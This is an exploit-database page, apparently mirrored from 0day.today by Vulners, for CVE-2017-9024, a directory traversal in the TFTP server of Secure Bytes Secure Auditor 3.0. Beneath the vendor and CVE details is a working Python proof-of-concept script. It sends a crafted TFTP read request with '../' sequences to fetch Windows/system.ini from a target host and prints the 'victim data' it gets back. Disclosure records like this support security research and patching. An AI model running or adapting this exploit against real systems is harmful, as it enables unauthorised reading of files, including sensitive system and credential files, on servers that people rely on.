Lucene search
K

Secure Auditor 3.0 - Directory Traversal Exploit

🗓️ 21 May 2017 00:00:00Reported by hyp3rlinxType 
zdt
 zdt
🔗 0day.today👁 37 Views

Secure Auditor directory traversal vulnerability and exploi

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Secure Auditor Directory Traversal Vulnerability
22 May 201700:00
cnvd
CVE
CVE-2017-9024
21 May 201714:00
cve
Cvelist
CVE-2017-9024
21 May 201714:00
cvelist
Exploit DB
Secure Auditor 3.0 - Directory Traversal
20 May 201700:00
exploitdb
exploitpack
Secure Auditor 3.0 - Directory Traversal
20 May 201700:00
exploitpack
NVD
CVE-2017-9024
21 May 201714:29
nvd
OSV
CVE-2017-9024
21 May 201714:29
osv
Packet Storm
Secure Auditor 3.0 Directory Traversal
20 May 201700:00
packetstorm
Prion
Directory traversal
21 May 201714:29
prion
[+] Credits: John Page aka HYP3RLINX    
 
Vendor:
====================
www.secure-bytes.com
 
  
Product:
=====================
Secure Auditor - v3.0
 
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
 
 
 
Vulnerability Type:
===================
Directory Traversal
 
 
 
CVE Reference:
==============
CVE-2017-9024
 
 
 
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
 
 
 
 
Exploit/POC:
=============
import sys,socket
 
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
 
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini' 
PORT = 69                                        
  
PAYLOAD = "\x00\x01"                #TFTP Read 
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
 
print "Victim Data located on : %s " %(HOST)
print out.strip()

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 May 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.09076
37